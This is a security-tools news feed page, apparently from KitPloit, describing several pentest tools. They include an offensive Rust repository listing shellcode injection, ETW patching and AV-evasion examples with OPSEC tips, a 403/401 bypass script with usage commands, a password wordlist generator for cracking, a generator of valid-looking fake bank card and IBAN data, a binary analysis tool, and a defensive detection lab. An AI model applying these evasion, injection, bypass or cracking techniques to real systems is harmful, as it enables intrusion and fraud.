πŸ”’
There are new articles available, click to refresh the page.
Today β€” 29 November 2021KitPloit - PenTest & Hacking Tools

OffensiveRust - Rust Weaponization For Red Team Engagements

29 November 2021 at 11:30
By: Zion3R


My experiments in weaponizing Rust for implant development and general offensive operations.


Why Rust?

  • It is faster than languages like C/C++
  • It is multi-purpose language, bearing excellent communities
  • It has an amazing inbuilt dependency build management called Cargo
  • It is LLVM based which makes it a very good candidate for bypassing static AV detection
  • Super easy cross compilation to Windows from *nix/MacOS, only requires you to install the mingw toolchain, although certain libraries cannot be compiled successfully in other OSes.

Examples in this repo

File Description
Allocate_With_Syscalls It uses NTDLL functions directly with the ntapi Library
Create_DLL Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
DeviceIoControl Opens driver handle and executing DeviceIoControl
EnableDebugPrivileges Enable SeDebugPrivilege in the current process
Shellcode_Local_inject Executes shellcode directly in local process by casting pointer
Execute_With_CMD Executes cmd by passing a command via Rust
ImportedFunctionCall It imports minidump from dbghelp and executes it
Kernel_Driver_Exploit Kernel Driver exploit for a simple buffer overflow
Named_Pipe_Client Named Pipe Client
Named_Pipe_Server Named Pipe Server
Process_Injection_CreateThread Process Injection in remote process with CreateRemoteThread
Unhooking Unhooking calls
asm_syscall Obtaining PEB address via asm
base64_system_enum Base64 encoding/decoding strings
http-https-requests HTTP/S requests by ignoring cert check for GET/POST
patch_etw Patch ETW
ppid_spoof Spoof parent process for created process
tcp_ssl_client TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
tcp_ssl_server TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
wmi_execute Executes WMI query to obtain the AV/EDRs in the host
Windows.h+ Bindings This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
UUID_Shellcode_Execution Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

Compiling the examples in this repo

This repository does not provide binaries, you're gonna have to compile them yourself.

Install Rust
Simply download the binary and install.

This repo was compiled in Windows 10 so I would stick to it. As mentioned OpenSSL binaries will have depencency issues that will require OpenSSL and perl to be installed. For the TCP SSL client/server I recommend static build due to dependencies on the hosts you will execute the binaries. For creating a project, execute:
cargo new <name> This will automatically create the structured project folders with:

project
β”œβ”€β”€ Cargo.toml
└── src
└── main.rs

Cargo.toml is the file that contains the dependencies and the configuration for the compilation. main.rs is the main file that will be compiled along with any potential directories that contain libraries.

For compiling the project, go into the project directory and execute:
cargo build

This will use your default toolchain. If you want to build the final "release" version execute:
cargo build --release

For static binaries, in terminal before the build command execute:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
set RUSTFLAGS=-C target-feature=+crt-static

In case it does not feel easy for you to read my code the way it is written,
you can also you the below command inside the project directory to format it in a better way
cargo fmt

Certain examples might not compile and give you some error, since it might require a nightly
build of Rust with the latest features. To install it just do:
rustup default nightly

The easiest place to find the dependencies or Crates as they are called.

Cross Compiling

Cross-Compiling requires to follow the instructions here By installing different toolchains, you can cross compile with the below command
cargo build --target <toolchain>

To see the installed toolchains on your system do:
rustup toolchain list

For checking all the available toolchains you can install in your system do:
rustup target list

For installing a new toolchain do:
rustup target add <toolchain_name>

Optimizing executables for size

This repo contains a lot of configuration options and ideas about reducing the file size. Static binaries are usually quite big.

Pitfalls I found myself falling into

Careful of \0 bytes, do not forget them for strings in memory, I spent a lot of my time but windbg always helped resolving it.

Interesting Rust libraries

  • WINAPI
  • WINAPI2
  • Windows - This is the official Microsoft one that I have not played much with

OPSEC

  • Even though Rust has good advantages it is quite difficult to get used to it and it ain't very intuitive.
  • Shellcode generation is another issue due to LLVM. I have found a few ways to approach this.
    Donut sometimes does generate shellcode that works but depending on how the project is made, it might not.
    In general, for shellcode generation the tools that are made should be made to host all code in .text segment, which leads to this amazing repo. There is a shellcode sample in this project that can show you how to structure your code for successfull shellcode generation.
    In addition, this project also has a shellcode generator that grabs the .text segment of a binary and and dumps the shellcode after executing some patches.
    This project grabs from a specific location the binary so I made a fork that receives the path of the binary as an argument here.
  • Even if you remove all debug symbols, rust can still keep references to your home directory in the binary. The only way I've found to remove this is to pass the following flag: --remap-path-prefix {your home directory}={some random identifier}. You can use bash variables to get your home directory and generate a random placeholder: --remap-path-prefix "$HOME"="$RANDOM". (By Yamakadi)
  • Although for the above there is another way to remove info about the home directory by adding at the top of Cargo.toml
    cargo-features = ["strip"] .
  • Since Rust by default leaves a lot of things as strings in the binary, I mostly use this cargo.toml to avoid them and also reduce size
    with build command
    cargo build --release -Z build-std=std,panic_abort -Z build-std-features=panic_immediate_abort --target x86_64-pc-windows-msvc

Other projects I have have made in Rust

Projects in Rust that can be hepfull

  • houdini - Helps make your executable self-delete


Yesterday β€” 28 November 2021KitPloit - PenTest & Hacking Tools

DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk

28 November 2021 at 20:30
By: Zion3R


DetectionLabELK is a fork from Chris Long's DetectionLab with ELK stack instead of Splunk.


Description:

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

Use cases:

A popular use case for DetectionLabELK is when you consider adopting MITRE ATT&CK framework and would like to develop detections for its tactics. You can use DetectionLabELK to quickly run atomic tests, see what logs are being generated and compare it to your production environment. This way you can:

  • Validate that your production logging is working as expected.
  • Ensure that your SIEM is collecting the correct events.
  • Enhance alerts quality by reducing false positives and eliminating false negatives.
  • Minimize coverage gaps.

Lab Information:

Primary Lab Features:

  • Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
  • Windoes Evenet forwarder along with Winlogbeat are pre-installed and all indexes are pre-created on ELK. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using Olaf's open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Lab Hosts:

  1. DC - Windows 2016 Domain Controller

    • WEF Server Configuration GPO
    • Powershell logging GPO
    • Enhanced Windows Auditing policy GPO
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards Sysmon & osquery)
    • Sysinternals Tools
    • Microsft Advanced Threat Analytics Lightweight Gateway
  2. WEF - Windows 2016 Server

    • Microsoft Advanced Threat Analytics
    • Windows Event Collector
    • Windows Event Subscription Creation
    • Powershell transcription logging share
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards WinEventLog & Powershell & Sysmon & osquery)
    • Sysinternals tools
  3. Win10 - Windows 10 Workstation

    • Simulates employee workstation
    • Sysmon
    • osquery
    • Sysinternals Tools
  4. Logger - Ubuntu 18.04

    • Kibana
    • Fleet osquery Manager
    • Bro
    • Suricata
    • Elastic Beats Forwarder (Forwards Bro logs & Suricata & osquery)
    • Guacamole
    • Velociraptor

Requirements

  • 55GB+ of free disk space
  • 16GB+ of RAM
  • Vagrant 2.2.2 or newer
  • Virtualbox

Deployment Options

  1. Use Vagrant Cloud Boxes - ETA ~2 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install the Vagrant-Reload plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK/Vagrant" and execute vagrant up.
  2. Build Boxes From Scratch - ETA ~5 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install "Vagrant-Reload" plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK" base directory and build the lab by executing ./build.sh virtualbox (Mac & Linux) or ./build.ps1 virtualbox (Windows).

Troubleshooting:

  • To verify that building process completed successfully, ensure you are in DetectionLabELK/Vagrant directory and run vagrant status. The four machines (wef,dc,logger and win10) should be running. if one of the machines was not running, execute vagrant reload <host>. If you would like to pause the whole lab, execute vagrant suspend and resume it using vagrant resume.
  • Deployment logs will be present in the Vagrant folder as vagrant_up_<host>.log

Lab Access:

Support: If you face any problem, please open a new issue and provide relevant log file.



4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

28 November 2021 at 11:30
By: Zion3R


>_ Introduction

4-ZERO-3 Tool to bypass 403/401. This script contain all the possible techniques to do the same.

  • NOTE : If you see multiple [200 Ok]/bypasses as output, you must check the Content-Length. If the content-length is same for multiple [200 Ok]/bypasses means false positive. Reason can be "301/302" or "../" [Payload] DON'T PANIC.
  • Script will print cURL PAYLOAD if possible bypass found.

>_ Preview



>_ Help

[email protected]_dheeraj:$ bash 403-bypass.sh -h



Β 

>_ Usage / Modes

  • Scan with specific payloads:
    • [ --header ] Support HEADER based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --header
    • [ --protocol ] Support PROTOCOL based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --protocol
    • [ --port ] Support PORT based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --port
    • [ --HTTPmethod ] Support HTTP Method based bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --HTTPmethod
    • [ --encode ] Support URL Encoded bypasses/payloads
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --encode
    • [ --SQLi ] Support MySQL mod_Security & libinjection bypasses/payloads [** New **]
      [email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --SQLi
  • Complete Scan {includes all exploits/payloads} for an endpoint [ --exploit ]
[email protected]_dheeraj:$ bash 403-bypass.sh -u https://target.com/secret --exploit
Prerequisites
  • apt install curl [Debian]


Before yesterdayKitPloit - PenTest & Hacking Tools

Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool

27 November 2021 at 20:30
By: Zion3R

Cracken is a fast password wordlist generator, Smartlist creation and password hybrid-mask analysis tool written in pure safe Rust (more on talk/). Inspired by great tools like maskprocessor, hashcat, Crunch and

ο€— HuggingFace's tokenizers.

What? Why? Woot??

At DeepSec2021 we presented a new method for analysing passwords as Hybrid-Masks exploiting common substrings in passwords by utilizing NLP tokenizers (more info on talk/).

Our method splits a password into its subwords instead of just a characters mask. HelloWorld123! splitted into ['Hello', 'World', '123!'] as these three subwords are very common in other passwords.

Hybrid Masks & Smartlists

  • Smartlists - Compact & representative subword lists created from passwords by utilizing NLP tokenizers
  • Hybrid-Mask - A representation of a password as a combination of wordlists & characters (e.g. ?w1?w2?l?d)

Analyzing RockYou Passwords with Smartlists & Hybrid-Masks:

full table here

Cracken

is used for:

  • Generating Hybrid-Masks very VERY FAST ο¦Έ (see performance section)
  • Building Smartlists - compact & representative list of subwords from given passwords files (using ο€— HuggingFace's tokenizers)
  • Analyzing passwords for their Hybrid-Masks - building statistics for better password candidates (again very fast)

Possible workflows with Cracken:

Simple:

  1. Generate wordlist candidates from a hybrid mask - e.g. cracken -w rockyou.txt -w 100-most-common.txt '?w1?w2?d?d?d?d?s'
  2. You can pipe the passwords Cracken generates into hashcat, john or your favorite password cracker

Advanced:

  1. Create a Smartlist from existing passwords - cracken create
  2. Analyze a passwords list of plaintext passwords - cracken entropy
  3. use most frequent Hybrid-Masks to generate password candidates fast - cracken generate -i hybrid-masks.txt

For more details see Usage section

Getting Started

download (linux only currently): latest release

for more installation options see installation section

run Cracken:

generate all words of length 8 starting with uppercase followed by 6 lowercase chars and then a digit:

$ cracken -o pwdz.lst '?u?l?l?l?l?l?l?d'

generate words from two wordlists with year suffix (1000-2999) <firstname><lastname><year>

$ cracken --wordlist firstnames.txt --wordlist lastnames.lst --charset '12' '?w1?w2?1?d?d?d'

create a Smartlist of size 50k from subwords extracted from rockyou.txt

$ cracken create -f rockyou.txt -m 50000 --smartlist smart.lst

estimate the entropy of hybrid mask of the password HelloWorld123! using a smartlist

$ cracken entropy -f smart.lst 'HelloWorld123!'

hybrid-min-split: ["hello", "world1", "2", "3", "!"]
hybrid-mask: ?w1?w1?d?d?s
hybrid-min-entropy: 42.73
--
charset-mask: ?l?l?l?l?l?l?l?l?l?l?d?d?d?s
charset-mask-entropy: 61.97

Performance

As of writing this, Cracken is probably the world's fastest wordlist generator:



Cracken has around 25% increased performance over hashcat's fast maskprocessor thats written in C.

Cracken can generate around 2 GB/s per core.

more details on benchmarks/

Why speed is important? A typical GPU can test billions passwords per second depending on the password hash function. When the wordlist generator produces fewer words per second than the cracking tool can handle - the cracking speed will degrade.

Hybrid-Masks Analysis Performance

Cracken uses A* algorithm to analyze passwords very fast. it can find the minimal Hybrid-Mask of passwords file at rate of ~100k Passwords/sec (cracken entropy -f words1.txt -f words2.txt ... -p pwds.txt)

Installation

install Cracken or compile from source

Download Binary (Linux Only Currently)

download latest release from releases

Build From Source (All Platforms)

Cracken is written in Rust and needs rustc to get compiled. Cracken should support all Platforms that Rust support.

installation instructions for cargo

there are two options building from source - installing with cargo from crates.io (preferred) or compiling manually from source.

1. install from crates.io (preferred)

install with cargo:

$ cargo install cracken

2. build from source

clone Cracken:

$ git clone https://github.com/shmuelamar/cracken

build Cracken:

$ cd cracken
$ cargo build --release

run it:

$ ./target/release/cracken --help

Usage Info

generator USAGE: cracken [SUBCOMMAND] FLAGS: -h, --help Prints help information -V, --version Prints version information SUBCOMMANDS: generate (default) - Generates newline separated words according to given mask and wordlist files create Create a new smartlist from input file(s) entropy Computes the estimated entropy of password or password file. The entropy of a password is the log2(len(keyspace)) of the password. There are two types of keyspace size estimations: * mask - keyspace of each char (digit=10, lowercase=26...). * hybrid - finding minimal split into subwords and charsets. For specific subcommand help run: cracken <subcommand> --help Example Usage: ## Generate Subcommand Examples: # all digits from 00000000 to 99999999 cracken ?d?d?d?d?d?d?d?d # all digits from 0 to 99999999 cracken -m 1 ?d?d?d?d?d?d?d?d # words with pwd prefix - pwd0000 to pwd9999 cracken pwd?d?d?d?d # all passwords of length 8 starting with upper then 6 lowers then digit cracken ?u?l?l?l?l?l?l?d # same as above, write output to pwds.txt instead of stdout cracken -o pwds.txt ?u?l?l?l?l?l?l?d # custom charset - all hex values cracken -c 0123456789abcdef '?1?1?1?1' # 4 custom charsets - the order determines the id of the charset cracken -c 01 -c ab -c de -c ef '?1?2?3?4' # 4 lowercase chars with years 2000-2019 suffix cracken -c 01 '?l?l?l?l20?1?d' # starts with firstname from wordlist followed by 4 digits cracken -w firstnames.txt '?w1?d?d?d?d' # starts with firstname from wordlist with lastname from wordlist ending with symbol cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1' # repeating wordlists multiple times and combining charsets cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d' ## Create Smartlists Subcommand Examples: # create smartlist from single file into smart.txt cracken create -f rockyou.txt --smartlist smart.txt # create smartlist from multiple files with multiple tokenization algorithms cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt # create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6 cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt ## Entropy Subcommand Examples: # estimating entropy of a password cracken entropy --smartlist vocab.txt 'helloworld123!' # estimating entropy of a passwords file with a charset mask entropy (default is hybrid) cracken entropy --smartlist vocab.txt -t charset -p passwords.txt # estimating the entropy of a passwords file cracken entropy --smartlist vocab.txt -p passwords.txt cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01) more info at: https://github.com/shmuelamar/cracken ">
$ cracken --help
Cracken v1.0.0 - a fast password wordlist generator

USAGE:
cracken [SUBCOMMAND]

FLAGS:
-h, --help Prints help information
-V, --version Prints version information

SUBCOMMANDS:
generate (default) - Generates newline separated words according to given mask and wordlist files
create Create a new smartlist from input file(s)
entropy
Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


For specific subcommand help run: cracken <subcommand> --help


Example U sage:

## Generate Subcommand Examples:

# all digits from 00000000 to 99999999
cracken ?d?d?d?d?d?d?d?d

# all digits from 0 to 99999999
cracken -m 1 ?d?d?d?d?d?d?d?d

# words with pwd prefix - pwd0000 to pwd9999
cracken pwd?d?d?d?d

# all passwords of length 8 starting with upper then 6 lowers then digit
cracken ?u?l?l?l?l?l?l?d

# same as above, write output to pwds.txt instead of stdout
cracken -o pwds.txt ?u?l?l?l?l?l?l?d

# custom charset - all hex values
cracken -c 0123456789abcdef '?1?1?1?1'

# 4 custom charsets - the order determines the id of the charset
cracken -c 01 -c ab -c de -c ef '?1?2?3?4'

# 4 lowercase chars with years 2000-2019 suffix
cracken -c 01 '?l?l?l?l20?1?d'

# starts with firstname from wordlist followed by 4 digits
cracken -w firstnames.txt '?w1?d?d?d?d'

# starts with firstname from wordlist with lastname from wordlist ending with symbol
cracken -w firstnames.txt -w lastnames.txt -c '[email protected]#$' '?w1?w2?1'

# repeating wordlists multiple times and combining charsets
cracken -w verbs.txt -w nouns.txt '?w1?w2?w1?w2?w2?d?d?d'


## Create Smartlists Subcommand Examples:

# create smartlist from single file into smart.txt
cracken create -f rockyou.txt --smartlist smart.txt

# create smartlist from multiple files with multiple tokenization algorithms
cracken create -t bpe -t unigram -t wordpiece -f rockyou.txt -f passwords.txt -f wikipedia.txt --smartlist smart.txt

# create smartlist with minimum subword length of 3 and max numbers-only subwords of size 6
cracken create -f rockyou.txt --min-word-len 3 --numbers-max-size 6 --smartlist smart.txt


## Entropy Subcommand Examples:

# estimating entropy of a password
cracken entropy --smartlist vocab.txt 'helloworld123!'

# estimating entropy of a passwords file with a charset mask entropy (default is hybrid)
cracken entropy --smartlist vocab.txt -t charset -p passwords.txt

# estimating the entropy of a passwords file
cracken entropy --smartlist vocab.txt -p passwords.txt

cracken-v1.0.0 linux-x86_64 compiler: rustc 1.56.1 (59eed8a2a 2021-11-01)
more info at: https://github.com/shmuelamar/cracken

Generate Subcommand Usage Info

$ cracken generate --help
cracken-generate
(default) - Generates newline separated words according to given mask and wordlist files

USAGE:
cracken generate [FLAGS] [OPTIONS] <mask> --masks-file <masks-file>

FLAGS:
-h, --help
Prints help information

-s, --stats
prints the number of words this command will generate and exits

-V, --version
Prints version information


OPTIONS:
-c, --custom-charset <custom-charset>...
custom charset (string of chars). up to 9 custom charsets - ?1 to ?9. use ?1 on the mask for the first charset

-i, --masks-file <masks-file>
a file containing masks to generate

-x, --maxlen <max-length>
maximum length of the mask to start from

-m, --minlen & lt;min-length>
minimum length of the mask to start from

-o, --output-file <output-file>
output file to write the wordlist to, defaults to stdout

-w, --wordlist <wordlist>...
filename containing newline (0xA) separated words. note: currently all wordlists loaded to memory


ARGS:
<mask>
the wordlist mask to generate.
available masks are:
builtin charsets:
?d - digits: "0123456789"
?l - lowercase: "abcdefghijklmnopqrstuvwxyz"
?u - uppercase: "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
?s - symbols: " !\"\#$%&'()*+,-./:;<=>[email protected][\\]^_`{|}~"
?a - all characters: ?d + ?l + ?u + ?s
?b - all binary values: (0-255)

custom charset s ?1 to ?9:
?1 - first custom charset specified by --charset 'mychars'

wordlists ?w1 to ?w9:
?w1 - first wordlist specified by --wordlist 'my-wordlist.txt'

Create Smartlist Subcommand Usage Info

$ cracken create --help  
cracken-create
Create a new smartlist from input file(s)

USAGE:
cracken create [FLAGS] [OPTIONS] --file <file>... --smartlist <smartlist>

FLAGS:
-h, --help Prints help information
-q, --quiet disables printing progress bar
-V, --version Prints version information

OPTIONS:
-f, --file <file>... input filename, can be specified multiple times for multiple files
--min-frequency <min_frequency> minimum frequency of a word, relevant only for BPE tokenizer
-l, --min-word-len <min_word_len> filters words shorter than the specified length
--numbers-max-size <numbers_max_size> filters numbers (all digits) longer than the specified size
-o, --smartlist <smartlist> output smartlist filename
-t, --tokenizer <tokeniz er>... tokenizer to use, can be specified multiple times.
one of: bpe,unigram,wordpiece [default: bpe] [possible values: bpe, unigram, wordpiece]
-m, --vocab-max-size <vocab_max_size> max vocabulary size

Entropy Subcommand Usage Info

$ cracken entropy --help
cracken-entropy

Computes the estimated entropy of password or password file.
The entropy of a password is the log2(len(keyspace)) of the password.

There are two types of keyspace size estimations:
* mask - keyspace of each char (digit=10, lowercase=26...).
* hybrid - finding minimal split into subwords and charsets.


USAGE:
cracken entropy [FLAGS] [OPTIONS] <password> --smartlist <smartlist>...

FLAGS:
-h, --help Prints help information
-s, --summary output summary of entropy for password
-V, --version Prints version information

OPTIONS:
-t, --mask-type <mask_type> type of mask to output, one of: charsets(charsets only), hybrid(charsets+wordlists) [possible values: hybrid, charset]
-p, --passwords-file <passwords-file> newline separated password file to estimate entropy for
-f, --smartlist <smartlist>... smartlist input file to estimate entropy with, a newline separated text file

ARGS:
<password> password to

License

Cracken is licensed under MIT. THIS PROJECT MUST BE USED FOR LEGAL PURPOSES ONLY


Contributing

Cracken is under active development, if you wish to help below is this the partial roadmap for this project. Feel free to submit PRs and open issues.



FakeDataGen - Full Valid Fake Data Generator

27 November 2021 at 11:30
By: Zion3R


FakeDataGen is a Full Valid Fake Data Generator.

This tool helps you to create fake accounts (in Spanish format) with fully valid data. Within this information, you can find the most common names, emails, bank details and other useful information.


Requirements

  • Python 3
  • Install requirements.txt

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/FakeDataGen

Usage

./FakeDataGen.py -h

_____ _ ____ _ ____
| ___|_ _| | _ ___| _ \ __ _| |_ __ _ / ___| ___ _ __
| |_ / _` | |/ / _ \ | | |/ _` | __/ _` | | _ / _ \ '_ \
| _| (_| | < __/ |_| | (_| | || (_| | |_| | __/ | | |
|_| \__,_|_|\_\___|____/ \__,_|\__\__,_|\____|\___|_| |_|

-------------------- by @JoelGMSec ---------------------

usage: FakeDataGen.py [-h] [-n NUMBER] [-b] [-e] [-f FILE] [-z] [-p PASSWORD]

optional arguments:
-h, --help show this help message and exit
-n NUMBER, --number NUMBER
The number of records should be created
-b, --bankdata Show only bank data (Card, CVV, IBAN..)
-e, --extended Show only extended info (City, Phone, SS..)
-f FILE, --file FILE File path to save data
-z, --zip Compress data to zip file
-p PASSWORD, --password PASSWORD
Password to protect zip file

The detailed guide of use can be found at the following link:

https://darkbyte.net/generando-datos-falsos-con-fakedatagen

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This script has been created and designed from scratch by Joel GΓ‘mez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



ELFXtract - An Automated Analysis Tool Used For Enumerating ELF Binaries

26 November 2021 at 20:30
By: Zion3R


ELFXtract is an automated analysis tool used for enumerating ELF binaries

Powered by Radare2 and r2ghidra

This is specially developed for PWN challenges and it has many automated features

It almost displays every details of the ELF and also decompiles its ASM to C code using r2ghidra

Decompiling ELFs in Ghidra takes more time, but in elfxtract it decompiles and displays in few seconds


Features in ELFXtract

  1. File info
  2. Shared object dependency details
  3. ELF Security Mitigation details / Checksec
  4. String details
  5. Header memory map
  6. ROP gadgets
  7. PLT Table
  8. GOT Table
  9. Function Table
  10. ASM code of functions
  11. Decompiled code of functions
  12. Predicting possible vulnerable functions

Installation

git clone https://github.com/AidenPearce369/elfxtract
cd elfxtract
chmod +x install.sh
./install.sh
pip install -r requirements.txt

Working

You can run elfxtract with any ELF along with -a to list all details from the ELF

Decompiler type: undefined8 main(void) { undefined8 s; sym.imp.puts("Enter your name"); sym.imp.gets(&s); sym.imp.printf("Your name is "); sym.imp.puts(&s); return 0; } *************************************************************************** > VULNERABLE FUNCTIONS : Possible vulnerability locations - Command Execution 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string) Possible vulnerability locations - Format String 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format) 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format) Possible vulnerability locations - Buffer Overflow 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s) *************************************************************************** ">
[email protected]:~/elfxtract$ python3 main.py --file programvuln -a

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************

> FILE INFO :

ELF Name : programvuln
ELF Type : ELF 64-bit LSB shared object
ELF Arch : x86-64
ELF SHA1 Hash : BuildID[sha1]=cf149d97ad1e895561080b1f5c317bc5bc1e8652

This binary is dynamically linked & not stripped

********************** *****************************************************

> SHARED OBJECT DEPENDENCY :

linux-vdso.so.1 (0x00007ffd525a4000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd610d93000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd610fa1000)

***************************************************************************

> ELF SECURITY MITIGATIONS :

RELRO : Full RELRO
STACK CANARY : No Canary found
NX BIT : NX disabled
PIE : PIE enabled
RPATH : No RPATH
RUNPATH : No RUNPATH

***************************************************************************

> POSSIBLE STRINGS :

nth paddr vaddr len size section type string
―――――――――――――――――――――――& #8213;―――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 31 32 .rodata ascii You have bypassed this function
1 0x00002028 0x00002028 12 13 .rodata ascii cat flag.txt
2 0x00002035 0x00002035 15 16 .rodata ascii Enter your name
3 0x00002045 0x00002045 13 14 .rodata ascii Your name is

***************************************************************************

> RODATA HEXDUMP :

0x00002000 01000200 00000000 596f7520 68617665 ........You have
0x00002010 20627970 61737365 64207468 69732066 bypassed this f
0x00002020 756e6374 696f6e00 63617420 666c6167 unction.cat flag
0x00002030 2e747874 00456e74 65722079 6f757220 .txt.Enter your
0x00002040 6e616d65 00596f75 72206e61 6d652069 name.Your name i
0x00002050 732000 s .


***************************************************************************

> ELF ENTRY POINT :

The entry point of the ELF is at 0x10c0

***************************************************************************

> HEADER MEMORY MAP :

Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000002d8 0x00000000000002d8 R 0x8
INTERP 0x0000000000000318 0x0000000000000318 0x0000000000000318
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000000006a8 0x00000000000006a8 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000002b5 0x00000000000002b5 R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x00000000000001c8 0x00000000000001c8 R 0x1000
LOAD 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000270 0x0000000000000278 RW 0x1000
DYNAMIC 0x0000000000002db0 0x0000000000003db0 0x0000000000003db0
0x00000000000001f0 0x00000000000001f0 RW 0x8
NOTE 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000358 0x0000000000000358 0x0000000000000358
0x0000000000000044 0x0000000000000044 R 0x4
GNU_PROPERTY 0x000000000 0000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x0000000000002054 0x0000000000002054 0x0000000000002054
0x000000000000004c 0x000000000000004c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
GNU_RELRO 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000260 0x0000000000000260 R 0x1

***************************************************************************
[*] Loaded 14 cached gadgets for 'programvuln'

> ROP GADGETS :

0x1017 : add esp, 8;ret
0x1016 : add rsp, 8;ret
0x1221 : leave;ret
0x128c : pop r12;pop r13;pop r14;pop r15;ret
0x128e : pop r13;pop r14;pop r15;ret
0x1290 : pop r14;pop r15;ret
0x12 92 : pop r15;ret
0x128b : pop rbp;pop r12;pop r13;pop r14;pop r15;ret
0x128f : pop rbp;pop r14;pop r15;ret
0x1193 : pop rbp;ret
0x1293 : pop rdi;ret
0x1291 : pop rsi;pop r15;ret
0x128d : pop rsp;pop r13;pop r14;pop r15;ret
0x101a : ret

***************************************************************************

> PLT TABLE :

__cxa_finalize : 0x1074
puts : 0x1084
system : 0x1094
printf : 0x10a4
gets : 0x10b4

***************************************************************************

> GOT TABLE :

_ITM_deregisterTMCloneTable : 0x3fd8
__libc_start_main : 0x3fe0
__gmon_start__ : 0x3fe8
_ITM_registerTMCloneTable : 0x3ff0
__cxa_finalize : 0x3ff8
puts : 0x3fb8
system : 0x3fc0
printf : 0x3fc8
gets : 0x3fd0

***************************************************************************

> FUNCTION TABLE :

__libc_csu_fini : 0x12a0
__libc_csu_init : 0x1230
win : 0x11a9
